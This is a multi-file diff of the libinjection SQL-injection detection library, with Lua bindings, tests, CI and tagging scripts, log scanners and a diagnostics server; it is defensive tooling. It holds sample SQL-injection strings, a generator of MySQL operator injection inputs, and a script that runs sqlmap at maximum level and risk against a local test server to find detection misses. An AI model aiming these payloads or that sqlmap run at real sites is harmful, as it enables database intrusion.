$doit $rmcmd -f "$dst" 2>/dev/null ||
{ $doit $mvcmd -f "$dst" "$rmtmp" 2>/dev/null &&
{ $doit $rmcmd -f "$rmtmp" 2>/dev/null; :; }
} ||
{ echo "$0: cannot unlink or rename $dst" >&2
(exit 1); exit 1
}
} &&
# Now rename the file to the real destination.
$doit $mvcmd "$dsttmp" "$dst"
}
fi || exit 1
trap '' 0
fi
done
# Local variables:
# eval: (add-hook 'write-file-hooks 'time-stamp)
# time-stamp-start: "scriptversion="
# time-stamp-format: "%:y-%02m-%02d.%02H"
# time-stamp-time-zone: "UTC"
# time-stamp-end: "; # UTC"
# End:

1
libinjection/lua/.gitignore vendored Normal file
View file

@ -0,0 +1 @@
lua-TestMore

41
libinjection/lua/data2lua.py Executable file
View file

@ -0,0 +1,41 @@
#!/usr/bin/env python
#
# Copyright 2012, 2013 Nick Galbreath
# nickg@client9.com
# BSD License -- see COPYING.txt for details
#
"""
Converts a libinjection JSON data file to a C header (.h) file
"""
def toc(obj):
""" main routine """
if False:
print 'fingerprints = {'
for fp in sorted(obj[u'fingerprints']):
print "['{0}']='X',".format(fp)
print '}'
words = {}
keywords = obj['keywords']
for k,v in keywords.iteritems():
words[str(k)] = str(v)
for fp in list(obj[u'fingerprints']):
fp = '0' + fp.upper()
words[str(fp)] = 'F';
print 'words = {'
for k in sorted(words.keys()):
#print "['{0}']='{1}',".format(k, words[k])
print "['{0}']={1},".format(k, ord(words[k]))
print '}'
return 0
if __name__ == '__main__':
import sys
import json
sys.exit(toc(json.load(sys.stdin)))

View file

@ -0,0 +1,26 @@
#!/usr/bin/env python
"""
Generates a Lua table of fingerprints.
One can then add, turn off or delete fingerprints from lua.
"""
def make_lua_table(obj):
"""
Generates table. Fingerprints don't contain any special chars
so they don't need to be escaped. The output may be
sorted but it is not required.
"""
fp = obj[u'fingerprints']
print("sqlifingerprints = {")
for f in fp:
print(' ["{0}"]=true,'.format(f))
print("}")
return 0
if __name__ == '__main__':
import sys
import json
with open('../c/sqlparse_data.json', 'r') as fd:
make_lua_table(json.load(fd))

View file

@ -0,0 +1,62 @@
/* libinjection.i SWIG interface file */
%module libinjection
%{
#include "libinjection.h"
#include "libinjection_sqli.h"
static char libinjection_lua_lookup_word(sfilter* sf, int lookup_type,
const char* s, size_t len)
{
lua_State* L = (lua_State*) sf->userdata;
//char* luafunc = (char *)lua_tostring(L, 2);
lua_getglobal(L, "lookup_word");
SWIG_NewPointerObj(L, (void*)sf, SWIGTYPE_p_libinjection_sqli_state, 0);
lua_pushnumber(L, lookup_type);
lua_pushlstring(L, s, len);
if (lua_pcall(L, 3, 1, 0)) {
printf("Something bad happened");
}
const char* result = lua_tostring(L, -1);
if (result == NULL) {
return 0;
} else {
return result[0];
}
}
%}
%include "typemaps.i"
// The C functions all start with 'libinjection_' as a namespace
// We don't need this since it's in the libinjection table
// i.e. libinjection.libinjection_is_sqli --> libinjection.is_sqli
//
%rename("%(strip:[libinjection_])s") "";
%typemap(in) (ptr_lookup_fn fn, void* userdata) {
if (lua_isnil(L, 1)) {
arg2 = NULL;
arg3 = NULL;
} else {
arg2 = libinjection_lua_lookup_word;
arg3 = (void *) L;
}
}
%typemap(out) stoken_t [ANY] {
int i;
lua_newtable(L);
for (i = 0; i < $1_dim0; i++) {
lua_pushnumber(L, i+1);
SWIG_NewPointerObj(L, (void*)(& $1[i]), SWIGTYPE_p_stoken_t,0);
lua_settable(L, -3);
}
SWIG_arg += 1;
}
%include "libinjection.h"
%include "libinjection_sqli.h"

View file

@ -0,0 +1,107 @@
require 'libinjection'
-- dofile('sqlifingerprints.lua')
-- silly callback that just calls back into C
-- identical to libinjection_is_sqli(sql_state, string_input, nil)
--
function check_pattern_c(sqlstate)
return(libinjection.sqli_blacklist(sqlstate) and
libinjection.sqli_not_whitelist(sqlstate))
end
-- half lua / half c checker
-- use lua based fingerprint lookup and still uses C code
-- to eliminate false positives
function check_pattern(sqlstate)
fp = sqlstate.pat
if sqlifingerprints[fp] == true then
-- try to eliminate certain false positives
return(libinjection.sqli_not_whitelist(sqlstate))
else
-- not sqli
return 0
end
end
function lookup_word(sqlstate, ltype, word)
if ltype == 'X' then
return words['0' .. word:upper()]
else
return words[word:upper()]
end
end
dofile('words.lua')
-- THIS USES BUILT IN FINGERPRINTS
-- (with last arg of 'nil')
sqli = '1 union select * from table'
sql_state = libinjection.sqli_state()
libinjection.sqli_init(sql_state, sqli, sqli:len(), 0)
print(libinjection.is_sqli(sql_state))
print(sql_state.pat)
print('----')
inputs = {
"123 LIKE -1234.5678E+2;",
"APPLE 1 9.123 'FOO' \"BAR\"",
"/* BAR */ UNION ALL SELECT (2,3,4)",
"1 || COS(+0X04) --FOOBAR",
"dog apple @cat banana bar",
"dog apple cat \"banana \'bar",
"102 TABLE CLOTH"
}
function benchmark(imax)
local x,s
local t0 = os.clock()
local sql_state = libinjection.sqli_state()
for x = 0, imax do
s = inputs[(x % 7) + 1]
libinjection.sqli_init(sql_state, s, s:len(), 0)
libinjection.is_sqli(sql_state)
end
local t1 = os.clock()
print( imax / (t1-t0) )
end
function benchmark_callback(imax)
local x,s
local t0 = os.clock()
local sql_state = libinjection.sqli_state()
for x = 0, imax do
s = inputs[(x % 7) + 1]
libinjection.sqli_init(sql_state, s, s:len(), 0)
libinjection.sqli_callback(sql_state, 'lookup_word');
libinjection.is_sqli(sql_state)
end
local t1 = os.clock()
print( imax / (t1-t0) )
end
benchmark(1000000)
benchmark_callback(1000000)
-- THIS USES LUA FINGERPRINTS via 'check_pattern' function above
if 0 then
for x = 1,2 do
ok = libinjection.is_sqli(sql_state)
if ok == 1 then
print(sql_state.pat)
vec = sql_state.tokenvec
for i = 1, sql_state.pat:len() do
print(vec[i].type, vec[i].val)
end
end
end
end

74
libinjection/lua/make_test.py Executable file
View file

@ -0,0 +1,74 @@
#!/usr/bin/env python
import glob
import sys
def readtestdata(filename):
"""
Read a test file and split into components
"""
state = None
info = {
'--TEST--': '',
'--INPUT--': '',
'--EXPECTED--': ''
}
for line in open(filename, 'r'):
line = line.rstrip()
if line in ('--TEST--', '--INPUT--', '--EXPECTED--'):
state = line
elif state:
info[state] += line + '\n'
# remove last newline from input
info['--INPUT--'] = info['--INPUT--'][0:-1]
return (info['--TEST--'], info['--INPUT--'].strip(), info['--EXPECTED--'].strip())
def luaescape(s):
return s.strip().replace("\\", "\\\\").replace("\n", "\\n").replace("'", "\\'")
def genluatest(fname, data):
# TBD: change to python os.path
name = fname.split('/')[-1]
if name.startswith('test-tokens-'):
testname = 'test_tokens'
extra = "\\n"
elif name.startswith('test-tokens_mysql'):
testname = 'test_tokens_mysql'
extra = "\\n"
elif name.startswith('test-folding-'):
testname = 'test_folding'
extra = "\\n"
elif name.startswith('test-sqli-'):
testname = 'test_fingerprints'
extra = ''
else:
#print "IGNORING: " + name
return
name = name.replace('.txt', '')
print "is({0}('{1}'),\n '{2}{3}',\n '{4}')\n".format(
testname,
luaescape(data[1]),
extra,
luaescape(data[2]),
name
)
def test2lua(fname):
data = readtestdata(fname)
genluatest(fname, data)
def main():
print "require 'testdriver'\n"
files = glob.glob('../tests/test-*.txt')
print "plan({0})\n".format(len(files))
for testfile in sorted(files):
test2lua(testfile)
if __name__ == '__main__':
main()

View file

@ -0,0 +1,90 @@
require 'libinjection'
require 'Test.More'
require 'Test.Builder.Tester'
function trim(s)
return s:find'^%s*$' and '' or s:match'^%s*(.*%S)'
end
function print_token_string(tok)
local out = ''
if tok.str_open ~= '\0' then
out = out .. tok.str_open
end
out = out .. tok.val
if tok.str_close ~= '\0' then
out = out .. tok.str_close
end
return trim(out)
end
function print_token(tok)
local out = ''
out = out .. tok.type
out = out .. ' '
if tok.type == 's' then
out = out .. print_token_string(tok)
elseif tok.type == 'v' then
if tok.count == 1 then
out = out .. '@'
elseif tok.count == 2 then
out = out .. '@@'
end
out = out .. print_token_string(tok)
else
out = out .. tok.val
end
return '\n' .. trim(out)
end
function test_tokens(input)
local out = ''
local sql_state = libinjection.sqli_state()
libinjection.sqli_init(sql_state, input, input:len(),
libinjection.FLAG_QUOTE_NONE + libinjection.FLAG_SQL_ANSI)
while (libinjection.sqli_tokenize(sql_state) == 1) do
out = out .. print_token(sql_state.current)
end
return out
end
function test_tokens_mysql(input)
local out = ''
local sql_state = libinjection.sqli_state()
libinjection.sqli_init(sql_state, input, input:len(),
libinjection.FLAG_QUOTE_NONE + libinjection.FLAG_SQL_MYSQL)
while (libinjection.sqli_tokenize(sql_state) == 1) do
out = out .. print_token(sql_state.current)
end
return out
end
function test_folding(input)
local out = ''
local sql_state = libinjection.sqli_state()
libinjection.sqli_init(sql_state, input, input:len(), 0)
libinjection.sqli_fingerprint(sql_state,
libinjection.FLAG_QUOTE_NONE + libinjection.FLAG_SQL_ANSI)
for i = 1, sql_state.fingerprint:len() do
-- c array is still 0 based
out = out .. print_token(libinjection.sqli_get_token(sql_state, i-1))
end
-- hack for when there is no output
if out == '' then
out = '\n'
end
return out
end
function test_fingerprints(input)
local out = ''
local sql_state = libinjection.sqli_state()
libinjection.sqli_init(sql_state, input, input:len(), 0)
local issqli = libinjection.is_sqli(sql_state)
if issqli == 1 then
out = sql_state.fingerprint
end
return out
end

85
libinjection/make-ci.sh Executable file
View file

@ -0,0 +1,85 @@
#!/bin/sh
# this is the script that runs in CI
set -e
DASH=----------------------
echo $DASH
gcc --version
echo $DASH
make clean
make -e check
make clean
#
# Code coverage
#
export CC=gcc
export CFLAGS="-ansi -g -O0 -fprofile-arcs -ftest-coverage -Wall -Wextra"
echo $DASH
echo "Generating code coverage"
echo "CFLAGS=$CFLAGS"
echo
make -e check
if [ -n "$COVERALLS_REPO_TOKEN" ] ; then
echo "uploading to coveralls"
coveralls \
--gcov-options '\-lp' \
--exclude-pattern '.*h' \
--exclude src/reader.c \
--exclude src/example1.c \
--exclude src/fptool.c \
--exclude src/test_speed_sqli.c \
--exclude src/test_speed_xss.c \
--exclude src/testdriver.c \
--exclude src/html5_cli.c \
--exclude src/sqli_cli.c \
--exclude python
fi
echo
unset CC
unset CFLAGS
echo
echo $DASH
clang --version
echo $DASH
./configure-clang.sh
echo
echo $DASH
echo "CLANG STATIC ANALYZER"
echo
cd src
make analyze
echo
echo $DASH
cppcheck --version
echo
cppcheck --std=c89 \
--enable=all \
--inconclusive \
--suppress=variableScope \
--suppress=missingIncludeSystem \
--quiet \
--error-exitcode=1 \
--template='{file}:{line} {id} {severity} {message}' \
.
echo "passed"
echo $DASH
export CFLAGS="-Wall -Wextra -Werror -pedantic -ansi -g -O1"
export VALGRIND="valgrind --gen-suppressions=no --leak-check=full --show-leak-kinds=all --read-var-info=yes --error-exitcode=1 --track-origins=yes --suppressions=/build/src/alpine.supp"
echo "GCC + VALGRIND"
echo $VALGRIND
echo
make clean
make -e check
unset VALGRIND
unset CFLAGS
echo
echo
echo "Done!"

28
libinjection/misc/gittag.sh Executable file
View file

@ -0,0 +1,28 @@
#!/bin/bash
set -e
# automated basic git tagging
# 1) edit the version number in
# c/libinjection_sqli.c
# pyton/setup.py
# 2) git add and commit
# 3) run this
# 4) done!
#
# get tag number
TAG=`grep 'LIBINJECTION_VERSION' ../c/libinjection_sqli.c | awk -F '"' '{print $2}' | tr -d '[[:space:]]'`
TAG="v${TAG}"
echo "TAG = ${TAG}"
echo "Tagging locally"
git tag -a "${TAG}" -m ${TAG}
echo "Sharing..."
git push origin "${TAG}"
git tag
echo "DONE"

45
libinjection/misc/home.md Normal file
View file

@ -0,0 +1,45 @@
LIBINJECTION
==========================
Libinjection is a small C library to detect SQLi attacks in user input with the following goals:
* Open. Source code is on [GitHub](https://github.com/client9/libinjection/).
* Low _false-positives_. When there are high false positives, people tend to turn off any WAF or protection.
* Excellent detection of SQLi.
* High performance (currently [over 500,000 TPS](https://libinjection.client9.com/cicada/artifacts/libinjection/libinjection-speed/latest/console.txt))
* Easy to test and QA
* Easy to integrate and extend
### [Try it now](/diagnostics)
### Easy to integrate
* Standard C code, and compiles as C99 and C++, with bindings to
* [Python](https://github.com/client9/libinjection/wiki/doc-sqli-python)
* [PHP](https://github.com/client9/libinjection/wiki/doc-sqli-php)
* [Lua](https://github.com/client9/libinjection/tree/master/lua)
* Small - about [1500 lines of code](https://libinjection.client9.com/cicada/artifacts/libinjection/libinjection-loc/latest/console.txt) in three files
* Compiles on Linux/Unix/BSD, Mac and Windows
* No threads used and thread safe
* No recursion
* No (heap) memory allocation
* No extenal library dependencies
* [400+ unit tests](https://github.com/client9/libinjection/tree/master/tests)
* [98% code coverage](https://libinjection.client9.com/cicada/artifacts/libinjection/libinjection-coverage-unittest/latest/lcov-html/libinjection/src/index.html)
* [BSD License](https://github.com/client9/libinjection/blob/master/COPYING)
Third-Party Ports
---------------------
* [java](https://github.com/Kanatoko/libinjection-Java)
* At least two .NET ports exists
* Another python wrapper
Applications
---------------------
* [ModSecurity](http://www.modsecurity.org/) - since 2.7.4 release
* [IronBee](https://www.ironbee.com) - since May 2013
* Proprietary Honeypot
* Proprietary WAF, Russia
* Proprietary WAF, Japan

64
libinjection/misc/logscanner.py Executable file
View file

@ -0,0 +1,64 @@
#!/usr/bin/env python
import sys
import re
import libinjection
import urllib
import urlparse
logre = re.compile(r' /diagnostics\?([^ ]+) HTTP')
notsqli = set([
'1ov',
'UEvEv',
'v',
'Uv',
'Uv,',
'UoEvE',
'1v',
'sov',
'1nn',
'UonnE',
'no1',
'Evk',
'E1k',
'E11k',
'Ek',
'Uv,Ev',
'UvEvk',
'UvEv,',
'Uvon'
])
def doline(logline):
"""
...GET /diagnostics?id=%22union+select HTTP/1.1
"""
mo = logre.search(logline)
if not mo:
return
sqli= False
fp = None
for key, val in urlparse.parse_qsl(mo.group(1)):
val = urllib.unquote(val)
extra = {}
argsqli = libinjection.detectsqli(val, extra)
if argsqli:
fp = extra['fingerprint']
print urllib.quote(val)
sqli = sqli or argsqli
if False: # and not sqli:
#print "\n---"
#print mo.group(1)
for key, val in urlparse.parse_qsl(mo.group(1)):
val = urllib.unquote(val)
extra = {}
argsqli = libinjection.detectsqli(val, extra)
if not argsqli and extra['fingerprint'] not in notsqli:
print "NO", extra['fingerprint'], mo.group(1)
print " ", val
if __name__ == '__main__':
for line in sys.stdin:
doline(line)

213
libinjection/misc/logscanner2.py Executable file
View file

@ -0,0 +1,213 @@
#!/usr/bin/env python
import datetime
import json
import sys
from urlparse import *
import urllib
import libinjection
from tornado import template
from tornado.escape import *
import re
import calendar
months = {
'Jan':'01',
'Feb':'02',
'Mar':'03',
'Apr':'04',
'May':'05',
'Jun':'06',
'Jul':'07',
'Aug':'08',
'Sep':'09',
'Oct':'10',
'Nov':'11',
'Dec':'12'
}
# "time_iso8601":"2013-08-04T03:51:18+00:00"
def parse_date(datestr):
elems = (
datestr[7:11],
months[datestr[3:6]],
datestr[0:2],
datestr[12:14],
datestr[15:17],
datestr[18:20],
)
return ( "{0}-{1}-{2}T{3}:{4}:{5}+00:00".format(*elems), calendar.timegm( [ int(i) for i in elems] ) )
apachelogre = re.compile(r'^(\S*) (\S*) (\S*) \[([^\]]+)\] \"([^"\\]*(?:\\.[^"\\]*)*)\" (\S*) (\S*) \"([^"\\]*(?:\\.[^"\\]*)*)\" \"([^"]*)\" \"([^"]*)\"')
def parse_apache(line):
mo = apachelogre.match(line)
if not mo:
return None
(time_iso, timestamp) = parse_date(mo.group(4))
try:
(method, uri, protocol) = mo.group(5).split(' ', 2)
except ValueError:
(method, uri, protocol) = ('-', '-', '-')
data = {
'remote_addr': mo.group(1),
'time_iso8601': time_iso,
'timestamp' : timestamp,
'request_protocol': protocol,
'request_method': method,
'request_uri': uri,
'request_length': '',
'request_time': '',
'status': mo.group(6),
'bytes_sent': '',
'body_bytes-sent': int(mo.group(7)),
'http_referrer': mo.group(8),
'http_user_agent': mo.group(9),
'ssl_cipher': '',
'ssl_protocol': ''
}
return data
# http://stackoverflow.com/questions/312443/how-do-you-split-a-list-into-evenly-sized-chunks-in-python
def chunks(l, n):
"""
Yield successive n-sized chunks from l.
"""
for i in xrange(0, len(l), n):
yield l[i:i+n]
def breakify(s):
output = ""
for c in chunks(s, 40):
output += c
if ' ' not in c:
output += ' '
return output
def doline(line):
line = line.replace("\\x", "%").strip()
try:
data = json.loads(line)
except ValueError, e:
data = parse_apache(line)
if data is None:
sys.stderr.write("BAD LINE: {0}\n".format(line))
return None
if not data.get('request_uri','').startswith("/diagnostics"):
return None
urlparts = urlparse(data['request_uri'])
if len(urlparts.query) == 0:
return None
qsl = [ x.split('=', 1) for x in urlparts.query.split('&') ]
target = None
for k,v in qsl:
if k == 'id':
target = v
break
if target is None:
#print "no 'id'"
return None
# part one, normal decode
target = urllib.unquote_plus(target)
# do it again, but preserve '+'
target = urllib.unquote(target)
sstate = libinjection.sqli_state()
# BAD the string created by target.encode is stored in
# sstate but not reference counted, so it can get
# deleted by python
# libinjection.sqli_init(sstate, target.encode('utf-8'), 0)
# instead make a temporary var in python
# with the same lifetime as sstate (above)
try:
targetutf8 = target.encode('utf-8')
#targetutf8 = target
except UnicodeDecodeError, e:
targetutf8 = target
#if type(target) == str:
# sys.stderr.write("Target is a string\n")
#if type(target) == unicode:
# sys.stderr.write("Target is unicde\n")
#sys.stderr.write("OOps: {0}\n".format(e))
#sys.stderr.write("Encode error: {0}\n".format(target))
try:
libinjection.sqli_init(sstate, targetutf8, 0)
except TypeError:
sys.stderr.write("fail in decode: {0}".format(targetutf8))
if type(target) == str:
sys.stderr.write("Target is a string\n")
if type(target) == unicode:
sys.stderr.write("Target is unicde\n")
return None
sqli = bool(libinjection.is_sqli(sstate))
return (target, sqli, sstate.fingerprint, data['remote_addr'])
if __name__ == '__main__':
s = """
174.7.27.149 - - [29/Jul/2013:01:30:19 +0000] "GET /diagnostics?id=x|x||1&type=fingerprints HTTP/1.1" 200 1327 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36" "-"
"""
s = """
{"timestamp":1371091563,"remote_ip":"219.110.171.2","request":"/diagnostics?id=1+UNION+ALL+SELECT+1<<<&type=fingerprints","method":"GET","status":200,"user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/536.30.1 (KHTML, like Gecko) Version/6.0.5 Safari/536.30.1","referrer":"https://libinjection.client9.com/diagnostics","duration_usec":160518 }
{"timestamp":1371091563,"remote_ip":"219.110.171.2","request":"/diagnostics?id=2+UNION+ALL+SELECT+1<<<&type=fingerprints","method":"GET","status":200,"user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/536.30.1 (KHTML, like Gecko) Version/6.0.5 Safari/536.30.1","referrer":"https://libinjection.client9.com/diagnostics","duration_usec":160518 }
"""
if len(sys.argv) == 2:
fh = open(sys.argv[1], 'r')
else:
fh = sys.stdin
targets = set()
table = []
for line in fh:
parts = doline(line.strip())
if parts is None:
continue
# help it render in HTML
if parts[0] in targets:
continue
else:
targets.add(parts[0])
# add link
# add form that might render ok in HTML
# is sqli
# fingerprint
table.append( (
"/diagnostics?id=" + url_escape(parts[0]),
breakify(parts[0].replace(',', ', ').replace('/*', ' /*')),
parts[1],
parts[2],
parts[3]
)
)
table = reversed(table)
loader = template.Loader(".")
txt = loader.load("logtable.html").generate(
table=table,
now = str(datetime.datetime.now()),
ssl_protocol='',
ssl_cipher=''
)
print txt

8
libinjection/misc/mdgen.sh Executable file
View file

@ -0,0 +1,8 @@
#!/bin/bash
fname=$1
echo '{% extends "base.html" %}'
echo '{% block body %}'
#github-markup $fname
curl -H 'Content-Type: text/x-markdown' --data-binary @$fname https://api.github.com/markdown/raw
echo '{% end %}'

View file

@ -0,0 +1,79 @@
#!/bin/bash
#
# Sync ModSecurity / libinjection
#
# explode on error
set -e
#
# CLONE LIBINJECTION
#
if [ ! -d libinjection ]; then
git clone https://github.com/client9/libinjection.git
else
(cd libinjection; git pull)
fi
pwd
#
# CLONE MODSECURITY
#
if [ ! -d ModSecurity ]; then
git clone https://github.com/client9/ModSecurity.git
else
( cd ModSecurity; git pull )
fi
pwd
#
# Use right branch
#
(cd ModSecurity; git checkout remotes/trunk )
pwd
#
# COPY IN NEW LIBINJECTION
#
cp libinjection/COPYING.txt ModSecurity/apache2/
cp libinjection/c/libinjection.h ModSecurity/apache2/libinjection
cp libinjection/c/libinjection_sqli.c ModSecurity/apache2/libinjection
cp libinjection/c/libinjection_sqli.h ModSecurity/apache2/libinjection
cp libinjection/c/libinjection_sqli_data.h ModSecurity/apache2/libinjection
#
# REGENERATE / BUILD
#
cd ModSecurity
./autogen.sh
./configure
make
make distclean
#
# ADD NEW BITS
#
git add apache2/libinjection/COPYING.txt
git add apache2/libinjection/libinjection.h
git add apache2/libinjection/libinjection_sqli.h
git add apache2/libinjection/libinjection_sqli.c
git add apache2/libinjection/libinjection_sqli_data.h
# this file seems to get modified, reset just to be safe
git checkout standalone/Makefile.in
git commit -m 'libinjection sync'
#
# PUSH TO SPECIAL BRANCH
#
echo "pushing to remotes/trunk"
git push origin remotes/trunk
#
# PROFIT
#

View file

@ -0,0 +1,47 @@
#!/usr/bin/python
mysql_ops = (
'AND',
'&&',
'=',
'&',
'|',
'^',
'DIV',
'/',
'<=>',
'>=',
'>',
'<<',
'<=',
'<',
'LIKE',
'-',
'%',
'MOD',
'!=',
'<>',
'NOT LIKE',
'NOT REGEXP',
'OR',
'||',
'+',
'REGEXP',
'>>',
'RLIKE',
'NOT RLIKE',
'SOUNDS LIKE',
'*',
'XOR'
)
print '# mysql implicit conversions tests'
for op in mysql_ops:
if op == '+':
op = '%2B'
print "A' {0} 'B".format(op)
print "A '{0}' B".format(op)
print "'{0}'".format(op)
print "' {0} '".format(op)

111
libinjection/misc/nullserver.py Executable file
View file

@ -0,0 +1,111 @@
#!/usr/bin/env python
# A 'nullserver' that accepts input and generates output
# to trick sqlmap into thinking it's a database-driven site
#
import sys
import logging
import urllib
import tornado.httpserver
import tornado.ioloop
import tornado.web
import libinjection
class ShutdownHandler(tornado.web.RequestHandler):
def get(self):
global fd
fd.close()
sys.exit(0)
class CountHandler(tornado.web.RequestHandler):
def get(self):
global count
self.write(str(count) + "\n")
def boring(arg):
if arg == '':
return True
if arg == 'foo':
return True
if arg == 'NULL':
return True
try:
float(arg)
return True
except ValueError:
pass
return False;
class NullHandler(tornado.web.RequestHandler):
def get(self):
global fd
global count
params = self.request.arguments.get('id', [])
sqli = False
if len(params) == 0 or (len(params) == 1 and boring(params[0])):
# if no args, or a single value with uninteresting input
# then just exit
self.write("<html><head><title>safe</title></head><body></body></html>")
return
for arg in params:
sqli = libinjection.detectsqli(arg)
if sqli:
break
# we didn't detect it :-(
if not sqli:
count += 1
args = [ arg.strip() for arg in params ]
#fd.write(' | '.join(args) + "\n")
for arg in args:
extra = {}
sqli = libinjection.detectsqli(arg, extra)
logging.error("\t" + arg + "\t" + str(sqli) + "\t" + extra['fingerprint'] + "\n")
#for arg in param:
# fd.write(arg + "\n")
# #fd.write(urllib.quote_plus(arg) + "\n")
self.set_status(500)
self.write("<html><head><title>safe</title></head><body></body></html>")
else:
self.write("<html><head><title>sqli</title></head><body></body></html>")
import os
settings = {
"static_path": os.path.join(os.path.dirname(__file__), "static"),
"cookie_secret": "yo mama sayz=",
"xsrf_cookies": True,
"gzip": False
}
application = tornado.web.Application([
(r"/null", NullHandler),
(r"/shutdown", ShutdownHandler),
(r"/count", CountHandler)
], **settings)
if __name__ == "__main__":
global fd
global count
count = 0
fd = open('./sqlmap-false-negatives.txt', 'w')
import tornado.options
#tornado.options.parse_config_file("/etc/server.conf")
tornado.options.parse_command_line()
http_server = tornado.httpserver.HTTPServer(application)
http_server.listen(8888)
tornado.ioloop.IOLoop.instance().start()

29
libinjection/misc/run_sqlmap.sh Executable file
View file

@ -0,0 +1,29 @@
#!/bin/bash
# Starts a bogus webserver that logs all input
# Then runs sqlmap
#
./nullserver.py --logging=none &
if [ ! -d "sqlmap" ]; then
git clone https://github.com/sqlmapproject/sqlmap.git
else
(cd sqlmap; git pull)
fi
SQLMAP=./sqlmap/sqlmap.py
URL=http://127.0.0.1:8888
HPP=
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=1
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=1234.5
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=foo
HPP=--hpp
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=1
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=1234.5
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=foo
curl -o /dev/null ${URL}/shutdown

339
libinjection/misc/sqliserver.py Executable file
View file

@ -0,0 +1,339 @@
#!/usr/bin/env python
#
#
#
import datetime
import sys
import logging
import urllib
import urlparse
try:
import libinjection
except:
pass
from tornado import template
import tornado.httpserver
import tornado.ioloop
import tornado.web
import tornado.wsgi
import tornado.escape
import tornado.options
def breakapart(s):
""" attempts to add spaces in a SQLi so it renders nicely on the webpage
"""
return s.replace(',', ', ').replace('/*',' /*')
# http://stackoverflow.com/questions/312443/how-do-you-split-a-list-into-evenly-sized-chunks-in-python
def chunks(l, n):
""" Yield successive n-sized chunks from l.
"""
for i in xrange(0, len(l), n):
yield l[i:i+n]
def breakify(s):
output = ""
for c in chunks(s, 20):
output += c
if ' ' not in c:
output += ' '
return output
def print_token_string(tok):
"""
returns the value of token, handling opening and closing quote characters
"""
out = ''
if tok.str_open != '\0':
out += tok.str_open
out += tok.val
if tok.str_close != '\0':
out += tok.str_close
return out
def print_token(tok):
"""
prints a token for use in unit testing
"""
out = ''
if tok.type == 's':
out += print_token_string(tok)
elif tok.type == 'v':
vc = tok.count;
if vc == 1:
out += '@'
elif vc == 2:
out += '@@'
out += print_token_string(tok)
else:
out += tok.val
return (tok.type, out)
def alltokens(val, flags):
if flags & libinjection.FLAG_QUOTE_SINGLE:
contextstr = 'single'
elif flags & libinjection.FLAG_QUOTE_DOUBLE:
contextstr = 'double'
else:
contextstr = 'none'
if flags & libinjection.FLAG_SQL_ANSI:
commentstr = 'ansi'
elif flags & libinjection.FLAG_SQL_MYSQL:
commentstr = 'mysql'
else:
raise RuntimeException("bad quote context")
parse = {
'comment': commentstr,
'quote': contextstr
}
args = []
sqlstate = libinjection.sqli_state()
libinjection.sqli_init(sqlstate, val, flags)
count = 0
while count < 25:
count += 1
ok = libinjection.sqli_tokenize(sqlstate)
if ok == 0:
break
args.append(print_token(sqlstate.current))
parse['tokens'] = args
args = []
fingerprint = libinjection.sqli_fingerprint(sqlstate, flags)
for i in range(len(sqlstate.fingerprint)):
args.append(print_token(libinjection.sqli_get_token(sqlstate,i)))
parse['folds'] = args
parse['sqli'] = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
parse['fingerprint'] = fingerprint
# todo add stats
return parse
class PageHandler(tornado.web.RequestHandler):
def get(self, pagename):
if pagename == '':
pagename = 'home'
self.add_header('X-Content-Type-Options', 'nosniff')
self.add_header('X-XSS-Protection', '0')
self.render(
pagename + '.html',
title = pagename.replace('-',' '),
ssl_protocol=self.request.headers.get('X-SSL-Protocol', ''),
ssl_cipher=self.request.headers.get('X-SSL-Cipher', '')
)
class XssTestHandler(tornado.web.RequestHandler):
def get(self):
settings = self.application.settings
ldr = template.Loader(".")
args = ['', '', '', '', '', '', '', '', '', '']
qsl = [ x.split('=', 1) for x in self.request.query.split('&') ]
for kv in qsl:
print kv
try:
index = int(kv[0])
val = tornado.escape.url_unescape(kv[1])
print "XXX", index, val
args[index] = val
except Exception,e:
print e
self.add_header('Cache-Control', 'no-cache, no-store, must-revalidate')
self.add_header('Pragma', 'no-cache')
self.add_header('Expires', '0')
self.add_header('X-Content-Type-Options', 'nosniff')
self.add_header('X-XSS-Protection', '0')
self.write(ldr.load('xsstest.html').generate(args=args))
class DaysSinceHandler(tornado.web.RequestHandler):
def get(self):
lastevasion = datetime.date(2013, 9, 12)
today = datetime.date.today()
daynum = (today - lastevasion).days
if daynum < 10:
days = "00" + str(daynum)
elif daynum < 100:
days = "0" + str(daynum)
else:
days = str(daynum)
self.render(
"days-since-last-bypass.html",
title='libinjection: Days Since Last Bypass',
days=days,
ssl_protocol=self.request.headers.get('X-SSL-Protocol', ''),
ssl_cipher=self.request.headers.get('X-SSL-Cipher', '')
)
class NullHandler(tornado.web.RequestHandler):
def get(self):
arg = self.request.arguments.get('type', [])
if len(arg) > 0 and arg[0] == 'tokens':
return self.get_tokens()
else:
return self.get_fingerprints()
def get_tokens(self):
ids = self.request.arguments.get('id', [])
if len(ids) == 1:
formvalue = ids[0]
else:
formvalue = ''
val = urllib.unquote(formvalue)
parsed = []
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_ANSI))
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_MYSQL))
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_SINGLE | libinjection.FLAG_SQL_ANSI))
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_SINGLE | libinjection.FLAG_SQL_MYSQL))
parsed.append(alltokens(val, libinjection.FLAG_QUOTE_DOUBLE | libinjection.FLAG_SQL_MYSQL))
self.add_header('Cache-Control', 'no-cache, no-store, must-revalidate')
self.add_header('Pragma', 'no-cache')
self.add_header('Expires', '0')
self.add_header('X-Content-Type-Options', 'nosniff')
self.add_header('X-XSS-Protection', '0')
self.render("tokens.html",
